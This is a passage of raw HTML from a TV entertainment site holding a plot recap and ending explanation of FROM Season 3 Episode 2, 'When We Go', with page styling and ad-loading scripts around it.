title="Pinterest" data-wpel-link="external" target="_blank" rel="nofollow external noopener noreferrer"><div class="td-social-but-icon"><i class="td-icon-pinterest"></i></div><div class="td-social-but-text">Pinterest</div></a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-whatsapp" href="https://api.whatsapp.com/send?text=From+Season+3+Episode+2+Recap+and+Ending+Explained%21 %0A%0A https://www.tvacute.com/from-season-3-episode-2-recap/" title="WhatsApp" data-wpel-link="external" target="_blank" rel="nofollow external noopener noreferrer"><div class="td-social-but-icon"><i class="td-icon-whatsapp"></i></div><div class="td-social-but-text">WhatsApp</div></a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-reddit" href="https://reddit.com/submit?url=https://www.tvacute.com/from-season-3-episode-2-recap/&amp;title=From+Season+3+Episode+2+Recap+and+Ending+Explained%21" title="ReddIt" data-wpel-link="external" target="_blank" rel="nofollow external noopener noreferrer"><div class="td-social-but-icon"><i class="td-icon-reddit"></i></div><div class="td-social-but-text">ReddIt</div></a></div><div class="td-social-sharing-hidden"><ul class="td-pulldown-filter-list"></ul><a class="td-social-sharing-button td-social-handler td-social-expand-tabs" href="#" data-block-uid="tdi_17" title="More">
<div class="td-social-but-icon"><i class="td-icon-plus td-social-expand-tabs-icon"></i></div>
</a></div></div></div><div class="td_block_wrap tdb_single_featured_image tdi_18 tdb-content-horiz-left td-pb-border-top td_block_template_1" data-td-block-uid="tdi_18">
<style>@media (max-width:767px){.tdi_18{margin-right:-20px!important;margin-left:-20px!important}}</style>
<style>.tdb_single_featured_image{margin-bottom:26px}.tdb_single_featured_image.tdb-sfi-stretch{opacity:0}.tdb_single_featured_image.tdb-sfi-stretch,.tdb_single_featured_image .tdb-block-inner{-webkit-transition:all 0.3s ease-in-out;transition:all 0.3s ease-in-out}.tdb_single_featured_image img{display:block;width:100%}.tdb_single_featured_image video{max-width:100%}.tdb_single_featured_image .tdb-caption-text{z-index:1;text-align:left;font-size:11px;font-style:italic;font-weight:normal;line-height:17px;color:#444}.tdb_single_featured_image.tdb-content-horiz-center .tdb-caption-text{text-align:center;left:0;right:0;margin-left:auto;margin-right:auto}.tdb_single_featured_image.tdb-content-horiz-right .tdb-caption-text{text-align:right;left:auto;right:0}.tdb-no-featured-img{background-color:#f1f1f1;width:100%;height:500px}.tdb-no-featured-audio{height:59px}.tdi_18 .td-audio-player{font-size:12px}.tdi_18 .tdb-caption-text{margin:6px 0 0}.tdi_18:hover .tdb-block-inner:before{opacity:0}</style><div class="tdb-block-inner td-fix-index">
<a href="https://www.tvacute.com/wp-content/uploads/2024/09/from-season-3-episode-2-When-We-Go.avif" data-caption="" data-wpel-link="internal" target="_self" rel="follow">
<img width="640" height="360" class="entry-thumb td-modal-image entered td-animation-stack-type0-2 lazyloaded" src="https://www.tvacute.com/wp-content/uploads/2024/09/from-season-3-episode-2-When-We-Go.avif" data-lazy-srcset="https://www.tvacute.com/wp-content/uploads/2024/09/from-season-3-episode-2-When-We-Go.avif 640w, https://www.tvacute.com/wp-content/uploads/2024/09/from-season-3-episode-2-When-We-Go-300x169.avif 300w, https://www.tvacute.com/wp-content/uploads/2024/09/from-season-3-episode-2-When-We-Go-150x84.avif 150w, https://www.tvacute.com/wp-content/uploads/2024/09/from-season-3-episode-2-When-We-Go-600x338.avif 600w" data-lazy-sizes="(max-width: 640px) 100vw, 640px" alt="from season 3 episode 2 When We Go" title="from season 3 episode 2 When We Go" data-lazy-src="https://www.tvacute.com/wp-content/uploads/2024/09/from-season-3-episode-2-When-We-Go.avif" data-ll-status="loaded" sizes="(max-width: 640px) 100vw, 640px" srcset="https://www.tvacute.com/wp-content/uploads/2024/09/from-season-3-episode-2-When-We-Go.avif 640w, https://www.tvacute.com/wp-content/uploads/2024/09/from-season-3-episode-2-When-We-Go-300x169.avif 300w, https://www.tvacute.com/wp-content/uploads/2024/09/from-season-3-episode-2-When-We-Go-150x84.avif 150w, https://www.tvacute.com/wp-content/uploads/2024/09/from-season-3-episode-2-When-We-Go-600x338.avif 600w"><noscript><img 
                                        width="640" 
                                        height="360" 
                                        class="entry-thumb td-modal-image" 
                                        src="https://www.tvacute.com/wp-content/uploads/2024/09/from-season-3-episode-2-When-We-Go.avif" srcset="https://www.tvacute.com/wp-content/uploads/2024/09/from-season-3-episode-2-When-We-Go.avif 640w, https://www.tvacute.com/wp-content/uploads/2024/09/from-season-3-episode-2-When-We-Go-300x169.avif 300w, https://www.tvacute.com/wp-content/uploads/2024/09/from-season-3-episode-2-When-We-Go-150x84.avif 150w, https://www.tvacute.com/wp-content/uploads/2024/09/from-season-3-episode-2-When-We-Go-600x338.avif 600w" sizes="(max-width: 640px) 100vw, 640px" 
                                        alt="from season 3 episode 2 When We Go" 
                                        title="from season 3 episode 2 When We Go"
                                    /></noscript>
</a></div></div><div class="td_block_wrap tdb_single_content tdi_19 td-pb-border-top td_block_template_1 td-post-content tagdiv-type" data-td-block-uid="tdi_19">
<style>.tdb_single_content{margin-bottom:0;*zoom:1}.tdb_single_content:before,.tdb_single_content:after{display:table;content:'';line-height:0}.tdb_single_content:after{clear:both}.tdb_single_content .tdb-block-inner>*:not(.wp-block-quote):not(.alignwide):not(.alignfull.wp-block-cover.has-parallax):not(.td-a-ad){margin-left:auto;margin-right:auto}.tdb_single_content a{pointer-events:auto}.tdb_single_content .td-spot-id-top_ad .tdc-placeholder-title:before{content:'Article Top Ad'!important}.tdb_single_content .td-spot-id-inline_ad0 .tdc-placeholder-title:before{content:'Article Inline Ad 1'!important}.tdb_single_content .td-spot-id-inline_ad1 .tdc-placeholder-title:before{content:'Article Inline Ad 2'!important}.tdb_single_content .td-spot-id-inline_ad2 .tdc-placeholder-title:before{content:'Article Inline Ad 3'!important}.tdb_single_content .td-spot-id-bottom_ad .tdc-placeholder-title:before{content:'Article Bottom Ad'!important}.tdb_single_content .id_top_ad,.tdb_single_content .id_bottom_ad{clear:both;margin-bottom:21px;text-align:center}.tdb_single_content .id_top_ad img,.tdb_single_content .id_bottom_ad img{margin-bottom:0}.tdb_single_content .id_top_ad .adsbygoogle,.tdb_single_content .id_bottom_ad .adsbygoogle{position:relative}.tdb_single_content .id_ad_content-horiz-left,.tdb_single_content .id_ad_content-horiz-right,.tdb_single_content .id_ad_content-horiz-center{margin-bottom:15px}.tdb_single_content .id_ad_content-horiz-left img,.tdb_single_content .id_ad_content-horiz-right img,.tdb_single_content .id_ad_content-horiz-center img{margin-bottom:0}.tdb_single_content .id_ad_content-horiz-center{text-align:center}.tdb_single_content .id_ad_content-horiz-center img{margin-right:auto;margin-left:auto}.tdb_single_content .id_ad_content-horiz-left{float:left;margin-top:9px;margin-right:21px}.tdb_single_content .id_ad_content-horiz-right{float:right;margin-top:6px;margin-left:21px}.tdb_single_content .tdc-a-ad .tdc-placeholder-title{width:300px;height:250px}.tdb_single_content .tdc-a-ad .tdc-placeholder-title:before{position:absolute;top:50%;-webkit-transform:translateY(-50%);transform:translateY(-50%);margin:auto;display:table;width:100%}.tdb_single_content .tdb-block-inner.td-fix-index{word-break:break-word}.tdi_19,.tdi_19>p,.tdi_19 .tdb-block-inner>p{font-family:Rubik!important;font-size:17px!important;line-height:1.9!important}.tdi_19 h1{font-family:Rubik!important;font-weight:500!important}.tdi_19 h2{font-family:Roboto!important;font-weight:500!important}.tdi_19 h3:not(.tds-locker-title){font-family:Rubik!important;font-weight:500!important}.tdi_19 h4{font-family:Rubik!important;font-weight:500!important}.tdi_19 h5{font-family:Rubik!important;font-weight:500!important}.tdi_19 h6{font-family:Rubik!important;font-weight:500!important}.tdi_19 li{font-family:Rubik!important;font-size:15px!important}.tdi_19 li:before{margin-top:1px;line-height:15px!important}.tdi_19 .tdb-block-inner blockquote p{font-family:Rubik!important}@media (max-width:767px){.tdb_single_content .id_ad_content-horiz-left,.tdb_single_content .id_ad_content-horiz-right,.tdb_single_content .id_ad_content-horiz-center{margin:0 auto 26px auto}}@media (max-width:767px){.tdb_single_content .id_ad_content-horiz-left{margin-right:0}}@media (max-width:767px){.tdb_single_content .id_ad_content-horiz-right{margin-left:0}}@media (max-width:767px){.tdb_single_content .td-a-ad{float:none;text-align:center}.tdb_single_content .td-a-ad img{margin-right:auto;margin-left:auto}.tdb_single_content .tdc-a-ad{float:none}}@media (min-width:768px) and (max-width:1018px){.tdi_19,.tdi_19>p,.tdi_19 .tdb-block-inner>p{font-size:13px!important}}@media (max-width:767px){.tdi_19,.tdi_19>p,.tdi_19 .tdb-block-inner>p{font-size:13px!important}}</style><div class="tdb-block-inner td-fix-index"><p><span id="input-sentence~0">Season 3 of<strong> <span id="input-sentence~2"><a href="https://www.tvacute.com/category/From/" data-wpel-link="internal" target="_self" rel="follow">FROM</a></span></strong> brings back the mystery and terror as strange and horrifying happenings keep haunting the locals of Fromville. The plot resumes with Tabitha Matthews (played by <a href="https://m.imdb.com/name/nm1503432/?ref_=m_ttfcd_cl2" data-wpel-link="external" target="_blank" rel="nofollow external noopener noreferrer"><strong>Catalina Sandino Moreno</strong></a>) awakening in a Camden, Maine hospital in the season opener, EPISODE 1<strong> (“Shattered”).</strong></span><span id="input-sentence~1"> Though it seems as though she has left the terrifying town behind, the mystery only grows as she looks for the elusive Boy in White. As they frantically hunt for Tabitha in the woods, Jim <strong>(<a href="https://m.imdb.com/name/nm0047248/?ref_=m_ttfcd_cl3" data-wpel-link="external" target="_blank" rel="nofollow external noopener noreferrer">Eion Bailey</a>)</strong> and Kenny<strong> (Ricky He)</strong> come across odd statues and cottages.</span></p>
<p><span id="input-sentence~2"> Back in Fromville, the townspeople are terrified by the monsters, and food shortages worsen into a crisis as crops wilt. The demons even release the town’s livestock as their attacks intensify. Boyd <strong>(<a href="https://m.imdb.com/name/nm0674782/?ref_=m_ttfcd_cl1" data-wpel-link="external" target="_blank" rel="nofollow external noopener noreferrer">Halfred Perrineau</a>)</strong> is emotionally destroyed after Tian-Chen <strong>(Elizabeth Moy)</strong> is brutally murdered in front of him in a heartbreaking turn of events. </span><span id="input-sentence~3">EPISODE 2 <strong>“When We Go”</strong> dives deeper into the aftermath against this tragic backdrop, revealing even more surprises and information.</span></p>
<h2><span id="input-sentence~3">From Season 3 Episode 2 Recap<br>
</span></h2>
<p><span id="input-sentence~3">The terrible events of Episode 1 are resumed the next morning in this episode. The runaway animals from the barn surround Jade <strong>(David Alpay)</strong> and Victor<strong> (Scott McCord)</strong> as they arrive at the sheriff’s office.</span><span id="input-sentence~4"> The village is in disarray as they try to herd the animals back after the ‘Monsters’ released them all the night before, knowing that these animals are now their only source of food.</span></p><div class="code-block code-block-1" style="margin: 8px auto; text-align: center; display: block; clear: both;">
<script type="rocketlazyloadscript" async="" data-rocket-src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>

<ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-8058393775546814" data-ad-slot="7053790170" data-ad-format="auto" data-full-width-responsive="true"></ins>
<script type="rocketlazyloadscript">
     (adsbygoogle = window.adsbygoogle || []).push({});
</script></div>
<p>Middle of this mayhem – Jade finds a disturbing scene at the barn.<span id="input-sentence~5"> He discovers Tian-Chen’s lifeless body laying close to Boyd, who is bound to a pole. Boyd, clearly frightened, mumbles in an unknown tongue, explaining to him how the beasts had tormented Tian-Chen right in front of his eyes. The monsters mocked him by leaving the key to his handcuffs in his own shirt pocket, which added to the cruelty.</span><span id="input-sentence~6"> After returning to town with Tian-Chen’s body, Jade and Boyd deposit it in the church for a traditional funeral. The villagers don’t doubt Boyd’s survival, but Donna (played by Elizabeth Saunders) gets angry and accuses Boyd of killing Tian-Chen by pursuing the herd.</span><span id="input-sentence~7"> Donna retreats when she realizes she is placing too much blame on Boyd as he becomes enraged and defends his choices.</span></p>
<p>In yet another scene — Boyd is comforted by Kristi <strong>(Chloe Van Landschoot)</strong>, who begs him not to bear the weight of Tian-Chen’s passing.<span id="input-sentence~8"> While she tries to ease Boyd’s anguish – the death of Tian-Chen lingers over the community, as her comments echo Boyd’s previous support for her throughout her own hardships.</span></p>
<p>In the meantime, Jim and Kenny stumble upon something unexpected in the jungle.<span id="input-sentence~9"> Jim discovers a wonderful plot of wild crops and a lake full of fish after spending the night in a distant cottage – this is an odd discovery given the severe food shortages in “Fromville”. When Kenny finds out of his mother’s untimely death, their happiness is short-lived as they bring the loot back to town.</span><span id="input-sentence~10"> The young man is deeply sad – despite his attempts to appear stoic, and his sorrow is profoundly felt. A joyful song that seems to be ridiculing the locals is played on the diner’s record player, adding to the bizarre atmosphere.</span><span id="input-sentence~11"> Kenny crushes the player out of frustration in a symbolic act of defiance.</span></p><div class="code-block code-block-1" style="margin: 8px auto; text-align: center; display: block; clear: both;">
<script type="rocketlazyloadscript" async="" data-rocket-src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>

<ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-8058393775546814" data-ad-slot="7053790170" data-ad-format="auto" data-full-width-responsive="true"></ins>
<script type="rocketlazyloadscript">
     (adsbygoogle = window.adsbygoogle || []).push({});
</script></div>
<p>Enraged, Kenny comes up with a scheme to get revenge on the creatures. After collecting moonshine from the closed bar, he tells Boyd that he plans to set the monsters alive in the tunnels where they live.<span id="input-sentence~12"> Boyd chooses to go with Kenny after realizing how miserable he is. But as they get to the tunnel entrance, Boyd gently persuades Kenny to change his mind by relaying Tian-Chen’s last words – which are that Boyd needs to take care of Kenny because he will now be on his own.</span><span id="input-sentence~13"> Kenny gives up on his risky plan due to overwhelming emotion, and the two go back to town for Tian-Chen’s Funeral.</span></p>
<p>In the meantime, Pegah Ghafoori’s character Fatima Hassan is still having a difficult time with — her pregnancy and is underweight.<span id="input-sentence~14"> Mari (Kristi’s fiancée, portrayed by Kaelen Ohm) checks on her and reassures the pair that her symptoms are typical — when Ellis (played by Corteon Moore) brings her to the health center. But when Fatima is left alone at Colony House and starts to enjoy eating ‘Decaying vegetables’.</span><span id="input-sentence~15"> This unsettling moment suggests something worse — raising the possibility that the child she is carrying is connected to the — paranormal activities in Fromville.</span></p>
<p>In the end, Tabitha keeps looking for solutions. Victor’s father, Henry, is the man who wakes him up in his house.<span id="input-sentence~16"> She discovers startling information regarding his family’s abduction thirty years prior. Miranda Henry’s wife, has painted eerie images of Fromville, implying that the community has been stalking families for many years. The mystery surrounding Fromville grows as — Henry struggles to believe Tabitha’s account, making unforeseen connections between the past and present.</span><span id="input-sentence~17"></span></p><div class="code-block code-block-1" style="margin: 8px auto; text-align: center; display: block; clear: both;">
<script type="rocketlazyloadscript" async="" data-rocket-src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>

<ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-8058393775546814" data-ad-slot="7053790170" data-ad-format="auto" data-full-width-responsive="true"></ins>
<script type="rocketlazyloadscript">
     (adsbygoogle = window.adsbygoogle || []).push({});
</script></div>
<p>Jim Matthews and his eldest daughter Julie <strong>(Hannah Cheramy)</strong>, in addition to these central threads. Julie is obviously furious with Jim after his brief foray into the forest in the hopes of finding his missing wife — Tabitha.<span id="input-sentence~18"> She tells her horrific story from the previous night, when the creatures assaulted her and Ethan, and she laments her father’s lack of accountability. Julie reveals that the family was already having difficulty adjusting to the loss of their youngest son, Thomas, prior to becoming stuck in Fromville.</span><span id="input-sentence~19"> Jim and Tabitha abandoned Ethan during that time, which made Julie – who was only fifteen at the time – take on the role of a parent for her younger brother.</span></p>
<p>Julie is now unwilling to take on that job in ‘Fromville’, primarily out of concern that Jim’s careless antics could result in his demise.<span id="input-sentence~20"> This touching exchange between a father and daughter emphasizes the effects of trauma on each character and intensifies the family drama.</span></p>
<p>By the end of the episode — After listening to Julie’s concerns, Jim lets her and Ethan visit the barn while he goes home.<span id="input-sentence~21"> The most shocking moment is when the house phone mysterious rings. Jim is shocked to hear his late son Thomas’s voice — on the other end — when he answers the call. This terrifying scene shows that the dead are capable of communicating with the living in some way. More likely, though, the monsters are just utilizing this as another nasty way to torture the locals.</span></p><div class="code-block code-block-1" style="margin: 8px auto; text-align: center; display: block; clear: both;">
<script type="rocketlazyloadscript" async="" data-rocket-src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>

<ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-8058393775546814" data-ad-slot="7053790170" data-ad-format="auto" data-full-width-responsive="true"></ins>
<script type="rocketlazyloadscript">
     (adsbygoogle = window.adsbygoogle || []).push({});
</script></div>
<h2>From Season 3 Episode 2 Recap and Ending Explained!</h2>
<p><span id="input-sentence~0"> The last moments of<strong> FROM SEASON 3</strong>, <strong>EPISODE 2</strong> raise several concerns for viewers regarding the paranormal activities taking place in Fromville. Jim’s communication with his deceased kid suggests that the monsters may be tormenting the survivors with increasingly advanced and cunning techniques.</span><span id="input-sentence~1"> It’s unclear if this was actually Thomas speaking or if the creatures were pulling a practical joke, but it does pave the way for further darker turns in later episodes.</span></p>
<p>It will be intriguing to watch — how Jim, Kenny, Fatima, and the others handle the growing supernatural threats as the season goes on, especially as the town’s secrets gradually come to light.<span id="input-sentence~2"> What happens in the following part of the novel will definitely depend on the unexplained phone call, Fatima’s peculiar appetites, and the continued conflict between Jim and Julie.</span></p>
<p>Come back soon to <a href="https://www.tvacute.com/" data-wpel-link="internal" target="_self" rel="follow">tvacute.com</a> for additional previews, recaps, and info about <a href="https://www.tvacute.com/category/From/" data-wpel-link="internal" target="_self" rel="follow">FROM</a>!</p><div class="code-block code-block-1" style="margin: 8px auto; text-align: center; display: block; clear: both;">
<script type="rocketlazyloadscript" async="" data-rocket-src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>

<ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-8058393775546814" data-ad-slot="7053790170" data-ad-format="auto" data-full-width-responsive="true"></ins>
<script type="rocketlazyloadscript">
     (adsbygoogle = window.adsbygoogle || []).push({});
</script></div>
<p><strong><a title="[MGM+] FROM Season 2 Episode 9 Recap" href="https://www.tvacute.com/mgm-from-season-2-episode-9-recap/" target="_self" rel="bookmark noopener follow" data-wpel-link="internal">[MGM+] FROM Season 2 Episode 9 Recap</a></strong><br>
<strong><a title="[MGM+] FROM Season 2 Episode 8 Recap: Elgin is alive" href="https://www.tvacute.com/mgm-from-season-2-episode-8-recap/" target="_self" rel="bookmark noopener follow" data-wpel-link="internal">[MGM+] FROM Season 2 Episode 8 Recap: Elgin is alive</a></strong><br>
<strong><a title="[MGM+] FROM Season 2 Episode 7 Recap: Is Elgin Dead?" href="https://www.tvacute.com/mgm-from-season-2-episode-7-recap/" target="_self" rel="bookmark noopener follow" data-wpel-link="internal">[MGM+] FROM Season 2 Episode 7 Recap: Is Elgin Dead?</a></strong><br>
<strong><a title="[MGM+]FROM Season 2 Episode 6 Recap: Is Ellis dead? Explained!" href="https://www.tvacute.com/mgmfrom-season-2-episode-6-recap-is-ellis-dead-explained/" target="_self" rel="bookmark noopener follow" data-wpel-link="internal">[MGM+]FROM Season 2 Episode 6 Recap: Is Ellis dead? Explained!</a></strong></p>
<div class="code-block code-block-5" style="margin: 8px 0; clear: both;">
<script type="rocketlazyloadscript" async="" data-rocket-src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>

<ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-8058393775546814" data-ad-slot="7053790170" data-ad-format="auto" data-full-width-responsive="true"></ins>
<script type="rocketlazyloadscript">
     (adsbygoogle = window.adsbygoogle || []).push({});
</script></div>

</div></div><div class="td_block_wrap tdb_single_tags tdi_20 td-pb-border-top td_block_template_1" data-td-block-uid="tdi_20">
<style>.tdb_single_tags{margin-bottom:2px;font-family:'Open Sans','Open Sans Regular',sans-serif;font-weight:600}.tdb_single_tags span,.tdb_single_tags a{font-size:11px}.tdb_single_tags span{text-transform:uppercase}.tdb_single_tags a:hover{background-color:var(--td_theme_color,#4db2ec);border-color:var(--td_theme_color,#4db2ec);color:#fff}.tdb_single_tags ul{display:inline-block;margin:0;list-style-type:none;font-size:0}.tdb_single_tags li{display:inline-block;margin-left:0}.tdi_20 span{margin-right:4px;padding:2px 8px 3px;color:#fff;background-color:#fb4c7d}.tdi_20 a{margin-right:4px;padding:1px 7px 2px;border:1px solid #ededed;color:#111}.tdi_20 a:hover{background-color:#008d7f;border-color:#008d7f}@media (min-width:1019px) and (max-width:1140px){.tdi_20 a{border:1px solid #ededed}}@media (min-width:768px) and (max-width:1018px){.tdi_20 a{border:1px solid #ededed}}@media (max-width:767px){.tdi_20 a{border:1px solid #ededed}}</style><div class="tdb-block-inner td-fix-index"><ul class="tdb-tags"><li><span>Tags</span></li><li><a href="https://www.tvacute.com/tag/from-mgm/" data-wpel-link="internal" target="_self" rel="follow">From MGM</a></li><li><a href="https://www.tvacute.com/tag/from-season-3-episode-2/" data-wpel-link="internal" target="_self" rel="follow">From Season 3 Episode 2</a></li><li><a href="https://www.tvacute.com/tag/from-season-3-episode-2-recap/" data-wpel-link="internal" target="_self" rel="follow">From Season 3 Episode 2 Recap</a></li><li><a href="https://www.tvacute.com/tag/from-season-3-episode-2-recap-and-ending-explained/" data-wpel-link="internal" target="_self" rel="follow">From Season 3 Episode 2 Recap and Ending Explained!</a></li><li><a href="https://www.tvacute.com/tag/from-season-3-episode-2-when-we-go/" data-wpel-link="internal" target="_self" rel="follow">from season 3 episode 2 When We Go</a></li><li><a href="https://www.tvacute.com/tag/from-season-3-recap/" data-wpel-link="internal" target="_self" rel="follow">From Season 3 Recap</a></li></ul></div></div><div class="wpb_wrapper td_block_separator td_block_wrap vc_separator tdi_22  td_separator_solid td_separator_center"><span style="border-color:#EBEBEB;border-width:1px;width:100%;"></span>
<style scoped="">.td_block_separator{width:100%;align-items:center;margin-bottom:38px;padding-bottom:10px}.td_block_separator span{position:relative;display:block;margin:0 auto;width:100%;height:1px;border-top:1px solid #EBEBEB}.td_separator_align_left span{margin-left:0}.td_separator_align_right span{margin-right:0}.td_separator_dashed span{border-top-style:dashed}.td_separator_dotted span{border-top-style:dotted}.td_separator_double span{height:3px;border-bottom:1px solid #EBEBEB}.td_separator_shadow>span{position:relative;height:20px;overflow:hidden;border:0;color:#EBEBEB}.td_separator_shadow>span>span{position:absolute;top:-30px;left:0;right:0;margin:0 auto;height:13px;width:98%;border-radius:100%}html :where([style*='border-width']){border-style:none}.tdi_22{margin-top:28px!important;margin-bottom:20px!important}</style></div><div class="wpb_wrapper td_block_separator td_block_wrap vc_separator tdi_24  td_separator_solid td_separator_center"><span style="border-color:#EBEBEB;border-width:1px;width:100%;"></span>
<style scoped="">.tdi_24{margin-bottom:30px!important}</style></div><div class="td_block_wrap tdb_single_next_prev tdi_25 td-animation-stack td-pb-border-top td_block_template_1" data-td-block-uid="tdi_25">
<style>.tdi_25{margin-bottom:43px!important}</style>
<style>.tdb_single_next_prev{*zoom:1}.tdb_single_next_prev:before,.tdb_single_next_prev:after{display:table;content:'';line-height:0}.tdb_single_next_prev:after{clear:both}.tdb-next-post{font-family:'Roboto',sans-serif;width:48%;float:left;transform:translateZ(0);-webkit-transform:translateZ(0);min-height:1px;line-height:1}.tdb-next-post span{display:block;font-size:12px;color:#747474;margin-bottom:7px}.tdb-next-post a{font-size:15px;color:#222;line-height:21px;-webkit-transition:color 0.2s ease;transition:color 0.2s ease}.tdb-next-post a:hover{color:var(--td_theme_color,#4db2ec)}.tdb-post-next{margin-left:2%;text-align:right}.tdb-post-prev{margin-right:2%}.tdb-post-next .td-image-container{display:inline-block}.tdi_25 .td-module-container{display:flex;flex-direction:column}.tdi_25 .tdb-post-next .td-module-container{align-items:flex-end}.tdi_25 .td-image-container{display:block;order:0}.ie10 .tdi_25 .next-prev-title,.ie11 .tdi_25 .next-prev-title{flex:auto}.tdi_25 .tdb-next-post a{color:#fb4c7d;font-family:Rubik!important;font-size:15px!important;line-height:1.4!important;font-weight:500!important}.tdi_25 .tdb-next-post:hover a{color:#000000}.tdi_25 .tdb-next-post span{font-family:Rubik!important;font-size:11px!important;text-transform:uppercase!important}@media (min-width:1019px) and (max-width:1140px){}@media (min-width:768px) and (max-width:1018px){}@media (max-width:767px){.tdi_25 .tdb-next-post a{font-size:13px!important;line-height:1.2!important}}</style><div class="tdb-block-inner td-fix-index"><div class="tdb-next-post tdb-next-post-bg tdb-post-prev"><span>Previous article</span><div class="td-module-container"><div class="next-prev-title"><a href="https://www.tvacute.com/unprisoned-season-3/" data-wpel-link="internal" target="_self" rel="follow">Will there be UnPrisoned Season 3 On Hulu?</a></div></div></div></div></div><div class="td_block_wrap td_flex_block_4 tdi_26 td_with_ajax_pagination td-pb-border-top td_block_template_8 td_flex_block" data-td-block-uid="tdi_26">
<style>.td_block_template_8.widget>ul>li{margin-left:0!important}.td_block_template_8 .td-block-title{font-size:20px;font-weight:800;margin-top:0;margin-bottom:18px;line-height:29px;position:relative;overflow:hidden;text-align:left}.td_block_template_8 .td-block-title>*{position:relative;padding-right:20px;color:var(--td_text_header_color,#000)}.td_block_template_8 .td-block-title>*:before,.td_block_template_8 .td-block-title>*:after{content:'';display:block;height:4px;position:absolute;top:50%;margin-top:-2px;width:2000px;background-color:#f5f5f5}.td_block_template_8 .td-block-title>*:before{left:100%}.td_block_template_8 .td-block-title>*:after{right:100%}@media (max-width:767px){.td_block_template_8 .td-related-title a{font-size:15px}}.td_block_template_8 .td-related-title a:before{display:none}.td_block_template_8 .td-related-title a:first-child:after{display:none}.td_block_template_8 .td-related-title a:last-child:after{left:100%;right:auto}.td_block_template_8 .td-related-title .td-cur-simple-item{color:var(--td_theme_color,#4db2ec)}.tdi_26 .td-block-title>*:before,.tdi_26 .td-block-title>*:after{background-color:#71ef47!important}@media (max-width:767px){.tdi_26{margin-bottom:40px!important}}</style>
<style>.tdi_26 .td_module_wrap{padding-left:2.5px;padding-right:2.5px}.tdi_26 .td_block_inner{margin-left:-2.5px;margin-right:-2.5px}.tdi_26 .td_module_flex_1{padding-bottom:0px;margin-bottom:0px}.tdi_26 .td_module_flex_1 .td-module-container:before{bottom:-0px;border-width:0 0 1px 0;border-style:none;border-color:#eaeaea;border-color:#eaeaea}.tdi_26 .td_module_flex_4{padding-bottom:13px;margin-bottom:13px}.tdi_26 .td_module_flex_4 .td-module-container:before{bottom:-13px;border-width:0 0 1px 0;border-style:none;border-color:#eaeaea;border-color:#eaeaea}.tdi_26 .td_module_wrap:last-child{margin-bottom:0!important;padding-bottom:0!important}.tdi_26 .td_module_wrap:last-child .td-module-container:before{display:none}.tdi_26 .td_module_flex_1 .td-module-container{border-color:#eaeaea}.tdi_26 .td_module_flex_4 .td-module-container{border-color:#eaeaea}.tdi_26 .td_module_flex_1 .entry-thumb{background-position:center 50%}.tdi_26 .td_module_flex_4 .entry-thumb{background-position:center 50%}.tdi_26 .td_module_flex_4 .td-image-container{flex:0 0 30%;width:30%;display:block;order:0}.tdi_26 .td_module_flex_1 .td-image-wrap{padding-bottom:120%}.ie10 .tdi_26 .td_module_flex_1 .td-image-container,.ie11 .tdi_26 .td_module_flex_1 .td-image-container{flex:0 0 auto}.ie10 .tdi_26 .td_module_flex_4 .td-module-meta-info,.ie11 .tdi_26 .td_module_flex_4 .td-module-meta-info{flex:1}body .tdi_26 .td_module_flex_1 .td-favorite{font-size:36px;box-shadow:1px 1px 4px 0px rgba(0,0,0,0.2)}body .tdi_26 .td_module_flex_4 .td-favorite{font-size:36px;box-shadow:1px 1px 4px 0px rgba(0,0,0,0.2)}.tdi_26 .td_module_flex_4 .td-video-play-ico{width:20px;height:20px;font-size:20px}.tdi_26 .td_module_flex_1 .td-video-play-ico{top:50%;left:50%;transform:translate(-50%,-50%)}.tdi_26 .td_module_flex_1 .td-post-vid-time{display:block}.tdi_26 .td_module_flex_4 .td-post-vid-time{display:block}.tdi_26 .td_module_flex_1 .td-module-meta-info{position:absolute;bottom:0;left:0;width:100%;text-align:center;padding:15px 10px}.tdi_26 .td_module_flex_1 .td-category-pos-image .td-post-category:not(.td-post-extra-category){top:auto;bottom:0;left:50%;transform:translateX(-50%);-webkit-transform:translateX(-50%)}.tdi_26 .td_module_flex_1 .td-image-container{margin-left:auto;margin-right:auto}.tdi_26.td-h-effect-up-shadow .td_module_flex_1:hover .td-category-pos-image .td-post-category{transform:translate(-50%,-2px);-webkit-transform:translate(-50%,-2px)}.tdi_26 .td_module_flex_1 .entry-title{margin:10px 0 0 0;font-family:Rubik!important;font-size:15px!important;line-height:1.2!important;font-weight:500!important}.tdi_26 .td_module_flex_1 .td-audio-player{font-size:13px;opacity:1;visibility:visible;height:auto}.tdi_26 .td_module_flex_4 .td-audio-player{font-size:12px;opacity:1;visibility:visible;height:auto}.tdi_26 .td_module_flex_1 .td-post-category{padding:0px;background-color:rgba(255,255,255,0);color:#ffffff;font-family:Rubik!important;font-size:11px!important;font-weight:500!important;text-transform:uppercase!important}.tdi_26 .td_module_flex_1 .td-author-photo .avatar{width:20px;height:20px;margin-right:6px;border-radius:50%}.tdi_26 .td_module_flex_4 .td-author-photo .avatar{width:20px;height:20px;margin-right:6px;border-radius:50%}.tdi_26 .td_module_flex_1 .td-post-category:not(.td-post-extra-category){display:inline-block}.tdi_26 .td_module_flex_4 .td-post-category:not(.td-post-extra-category){display:inline-block}.tdi_26 .td_module_flex_1 .td-excerpt{display:none}.tdi_26 .td_module_flex_4 .td-excerpt{display:none}.tdi_26 .td_module_flex_1 .td-author-date{display:none}.tdi_26 .td_module_flex_4 .td-author-date{display:none}.tdi_26 .td_module_flex_1 .td-post-author-name{display:none}.tdi_26 .td_module_flex_4 .td-post-author-name{display:none}.tdi_26 .td_module_flex_1 .td-post-date,.tdi_26 .td_module_flex_1 .td-post-author-name span{display:none}.tdi_26 .td_module_flex_4 .td-post-date,.tdi_26 .td_module_flex_4 .td-post-author-name span{display:none}.tdi_26 